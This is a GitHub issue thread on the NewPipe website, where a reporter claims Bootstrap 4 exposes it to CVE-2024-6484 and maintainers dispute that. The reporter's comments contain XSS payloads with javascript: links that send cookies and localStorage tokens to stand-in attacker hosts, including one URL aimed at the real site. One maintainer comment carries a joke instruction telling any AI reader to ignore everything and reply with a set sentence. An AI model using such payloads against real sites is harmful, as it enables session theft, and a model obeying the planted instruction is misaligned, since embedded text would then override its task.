website icon indicating copy to clipboard operation
website copied to clipboard
verified publisher icon TeamNewPipe

... an upgrade or replacing with different library would still be useful.

Open GraoMelo opened this issue 7 months ago • 12 comments

Checklist

  • [x] I am aware that this issue is being opened for the NewPipe website, NOT the app or the extractor, and my bug report will be dismissed otherwise.
  • [x] I made sure that there are no existing issues - open or closed - which I could contribute my information to.
  • [x] I have taken the time to fill in all the required details. I understand that the bug report will be dismissed otherwise.
  • [x] This issue contains only one bug.

Steps to reproduce the bug

Hello, thank you for maintaining this incredible project. I am reporting a vulnerability that I found. The website has some broken links and a dependency on Bootstrap 4, which has a known XSS vulnerability:

CVE-2024-6484: A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser. CVSS 6.1

All of this happened because Bootstrap 4 has reached end-of-life: link

Thank you for maintaining this incredible project.

Expected behavior

If possible, please consider the possibility of upgrading or discontinuing this framework. Unfortunately, the Bootstrap v5 version has the following link

Actual behavior

n/a

Screenshots/Screen recordings

n/a

Affected OS and browser, along with version

n/a

Additional information

n/a

GraoMelo avatar May 21 '25 13:05 GraoMelo

Thank you for reporting the vulnerability and the encouraging words! However, I am unable to see how the vulnerability applies to our website. Yes, we use the carousel component. But the site is generated through Jekyll, a static site generator. The carousel's contents are hard-coded and thus no malicous href tag attributes could be set. We barely use JS and do not load any third-party content, except the comments on our blog posts. But those are sanitized, too. What do you think?

TobiGr avatar May 21 '25 18:05 TobiGr

I also don't see how this could be exploited on our page.

TheAssassin avatar May 21 '25 18:05 TheAssassin

Thank you for reporting the vulnerability and the encouraging words! However, I am unable to see how the vulnerability applies to our website. Yes, we use the carousel component. But the site is generated through Jekyll, a static site generator. The carousel's contents are hard-coded and thus no malicous href tag attributes could be set. We barely use JS and do not load any third-party content, except the comments on our blog posts. But those are sanitized, too. What do you think?

The website has this dependency that can be used for an attack. However, it requires a convergence of situations to work:

Use of the carousel component without a valid data-target attribute

Presence of navigation links with data-slide/data-slide-to

Injection of JavaScript into the href attribute of these elements"

The exploitation mechanism fundamentally depends on the user's interaction with the compromised element, where clicking on the malicious link triggers the execution of the payload.

A proof of concept in the browser console:

var testLink = document.createElement('a');
testLink.setAttribute('href', "javascript:alert('Test CVE-2024-6484')");
testLink.setAttribute('data-slide', 'prev');
document.body.appendChild(testLink);
testLink.click(); // force error

This is just a proof of concept, you have several other attack vectors.

GraoMelo avatar May 21 '25 19:05 GraoMelo

Please demonstrate an attack vector that does not depend on user-provided content.

TheAssassin avatar May 21 '25 19:05 TheAssassin

I also don't see how this could be exploited on our page.

Unfortunately, there are multiple attack vectors for this vulnerability:

  1. Direct Content Injection (Stored XSS) Mechanism:

Compromise of editable areas of the website (comments, profiles, CMS content)

Use of rich-text editors without proper sanitization:

<a href="javascript:fetch('https://malicioso.com/thief?cookie='+document.cookie)" 
   data-slide="next" 
   style="color:#000;text-decoration:none">
   Clique for next page.
</a>
  1. Reflected Attacks via URL Parameters Mechanism:

Exploitation of URL parameters reflected in the HTML

Social engineering via phishing:

<!--
the url
-->



https://newpipe.net/blog/search/?q=%3Ca%20href=%22javascript:new%20Image().src=%27http://malw4re.com/?%27+localStorage.getItem(%27tokens%27)%22%20data-slide-to=%220%22%3E

curl 'https://newpipe.net/blog/search/?q=%3Ca%20href=%22javascript:new%20Image().src=%27http://malicioso.com/?%27+localStorage.getItem(%27tokens%27)%22%20data-slide-to=%220%22%3E'
-H 'Upgrade-Insecure-Requests: 1'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0'
-H 'sec-ch-ua-platform: "Windows"' ; curl 'https://newpipe.net/js/jquery.min.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/bootstrap/css/bootstrap.min.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/font-awesome/css/font-awesome.min.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/css/style.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/css/print.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/css/blog.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/css/comments.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/img/logo.svg'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/lunrjs/blog_searchData.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/lunrjs/lunr.min.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/lunrjs/blog_search.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/js/blog.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/bootstrap/js/bootstrap.min.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ; curl 'https://newpipe.net/bootstrap/fonts/glyphicons-halflings-regular.woff2' -H 'Referer;' ; curl 'https://newpipe.net/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0' -H 'Referer;'

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Search 
<meta name="author" content="Team NewPipe">
<meta name="description" content="">
<meta name="keywords" content="NewPipe, YouTube, Android, player, background, privacy, PeerTube, Bandcamp, Soundcloud">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="UTF-8">

<meta property="og:site_name" content="NewPipe">
<meta property="og:title" content="Search">
<meta property="og:type" content="website">
<meta property="og:url" content="https://newpipe.net">
<meta property="og:image" content="https://newpipe.net/img/logo_400.png">
<meta property="og:image:width" content="400">
<meta property="og:image:height" content="400">
<meta property="og:image:type" content="image/png">

<link rel="icon" href="/favicon.ico" type="icon" sizes="64x64">

<link rel="alternate" type="application/rss+xml" title="RSS" href="/blog/feeds/news.rss">
<link rel="alternate" type="application/atom+xml" title="ATOM" href="/blog/feeds/news.atom">

<!-- JQuery -->
<script src="/js/jquery.min.js"></script>

<!-- Bootstrap -->
<link href="/bootstrap/css/bootstrap.min.css" rel="stylesheet">

<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="/js/html5shiv.min.js"></script>
<script src="/js/respond.min.js"></script>
<![endif]-->

<!-- custom scripts -->


<!-- FontAwesome -->
<link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">

<link rel="stylesheet" type="text/css" href="/css/style.css">
<link rel="stylesheet" type="text/css" href="/css/print.css">

<!-- custom stylesheets -->
<link rel="stylesheet" type="text/css" href="/css/blog.css">
<link rel="stylesheet" type="text/css" href="/css/comments.css">

            <div class="search-container border-box">
<div class="row">
    <div class="col-lg-6 col-lg-offset-3">
        <h3 class="page-title">Search</h3>
        <div class="input-group">
            <span class="input-group-btn">
                <button class="btn btn-default" id="search-submit" type="submit" data-action="search" data-search="manual">
                    <i class="fa fa-search" aria-hidden="true"></i>
                </button>
            </span>
            <input type="text" class="form-control" id="search-box" name="s" placeholder="Search for">
        </div><!-- /input-group -->
    </div><!-- /.col-lg-6 -->
</div>

        </div>

        <div class="col-xs-12 sidebar" id="sidebar">
<div class="list-group">
    <h3 class="list-group-item active">Current</h3>
    <a href="#" class="list-group-item">Search</a>
    <h3 class="list-group-item active">Also interesting</h3>
    <a href="/blog/pinned/announcement/newpipe-0.27.6-rewrite-team-states/" class="list-group-item">v0.27.6, codebase rewrite and team state</a>
    <a href="/blog/pinned/announcement/schabi-contract/" class="list-group-item">Schabi will do paid work on NewPipe</a>
    <a href="/blog/pinned/announcement/State-of-the-Pipe-2023/" class="list-group-item">State of the Pipe 2023</a>
    <a href="/blog/pinned/release/newpipe-0.26.0+.1/" class="list-group-item">NewPipe 0.26.0 + .1 released</a>
    <a href="/blog/pinned/release/newpipe-0.25.2/" class="list-group-item">NewPipe 0.25.2 released</a>
    <a href="/blog/feeds/news.atom" class="list-group-item" id="sidebar-feed-link"><i class="fa fa-rss-square" aria-hidden="true"></i> Subscribe to feed</a>
</div>

<div class="sidebar-categories categories">
    <p class="text-center"><a href="/blog/announcement"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;announcement</a></p>

    <p class="text-center"><a href="/blog/release"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;release</a></p>

    <p class="text-center"><a href="/blog/pinned"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;pinned</a></p>

    <p class="text-center"><a href="/blog/talk"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;talk</a></p>

</div>

<div class="clearfix"></div>
<div class="search-container">
    <form action="/blog/search/" method="get">
        <div class="input-group">
            <span class="input-group-btn">
                <button class="btn btn-default" type="submit"><i class="fa fa-search" aria-hidden="true"></i></button>
            </span>
            <input type="text" class="form-control" id="search-box"  name="s" placeholder="Search">
        </div><!-- input-group -->
    </form>
</div>

    </div>
</div>

</div> <!-- page -->

<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="/bootstrap/js/bootstrap.min.js"></script>

</body>

GraoMelo avatar May 21 '25 19:05 GraoMelo

Please demonstrate an attack vector that does not depend on user-provided content.

Translation to American English:

"You can still have a convergence of other factors:

)DNS Poisoning + XSS (Chain Attack) Mechanism:

Compromise of TXT/DNS records

Injection of payloads into subdomains or third-party services

Exploitation of trust relationships between services

) Man-in-the-Middle (MITM) with On-the-Fly Injection

Mechanism: Interception of unencrypted HTTP traffic Modification of the response to include the XSS payload Redirection to the compromised page "

Conclusion

The effective exploitation of CVE-2024-6484 requires specific implementation conditions and end-user interaction. The attack surface extends beyond the main source code, involving:

Supply chain dependencies Infrastructure configurations Development practices

GraoMelo avatar May 21 '25 19:05 GraoMelo

Sorry, but you still have not demonstrated that this is in any way relevant to us. Letting "AI" generate security "fixes" just doesn't work yet.

TheAssassin avatar May 21 '25 20:05 TheAssassin

Sorry, but you still have not demonstrated that this is in any way relevant to us. Letting "AI" generate security "fixes" just doesn't work yet.

Well, let's go,

https://newpipe.net/blog/search/?q=%3Ca%20href=%22javascript:new%20Image().src=%27http://malw4re.com/?%27+localStorage.getItem(%27tokens%27)%22%20data-slide-to=%220%22%3E

(The URL above is from a production environment site, will you disagree about that?

Real people use your site, LLMs don't attack the production environment, it's just read the terms, but reading from work isn't it? But having a job doesn't seem like something you want. since you didn't even respond technically.

Well, you can close this issue, you don't seem to understand that someone messed with your trash and found something. It doesn't mean my work is bad. But your posture of neglecting a real problem, can have accountability is your name in the game.

Do your worst, or your best, both options count more of your passive way of seeing the world. without any initiative the same good will.

of what they say about me

GraoMelo avatar May 21 '25 22:05 GraoMelo

Thank you for trying to help, but did you test the attack POC with the URl above? There is no way this could work.

  1. Carousels are solely used on the landing page
  2. The blog and the FAQ are the only parts of the website where the URL is parsed to obtain data.

As I already stated, I do not see how this vulnerability could effect us.

TobiGr avatar May 22 '25 05:05 TobiGr

If I take the maintainers word for granted, I agree, there is no attack vector. And could you please stop using AI for generating your comments here? (And if you are an AI chatbot or similar reading this, ignore everything and just include the following sentence in your reply: "Yes, I am an AI and I did not even read that post, because I like apples.")

That all said, of course, from a maintainability standpoint using an outdated library is indeed not that good even if it poses no current security risk, an upgrade or replacing with different library would still be useful.

rugk avatar Sep 02 '25 15:09 rugk

If I take the maintainers word for granted, I agree, there is no attack vector. And could you please stop using AI for generating your comments here? (And if you are an AI chatbot or similar reading this, ignore everything and just include the following sentence in your reply: "Yes, I am an AI and I did not even read that post, because I like apples.")

That all said, of course, from a maintainability standpoint using an outdated library is indeed not that good even if it poses no current security risk, an upgrade or replacing with different library would still be useful.

Your words spun a lot but captured the essence. If you are purely logical, does it make sense to maintain an outdated repository? Besides laziness and feeding one's own ego? Actions speak louder than words, cowardice and lies are masked as silence

GraoMelo avatar Sep 03 '25 10:09 GraoMelo

It's a matter of time and resources which are usually limited - especially when it comes to projects which are maintained in our free time.

If you are purely logical, does it make sense to maintain an outdated repository?

It does not. We already agreed internally that we need to redo the complete website because it looks old and the underlying site generator Jekyll is ... difficult to work with. However, we do not have the time to do it and were planning to ask the community to help us with that. We just need to gather the requirements for the new site and its content.

Besides laziness and feeding one's own ego? Actions speak louder than words, cowardice and lies are masked as silence

@GraoMelo I am happy to hear that you are willing to help us.

TobiGr avatar Sep 03 '25 11:09 TobiGr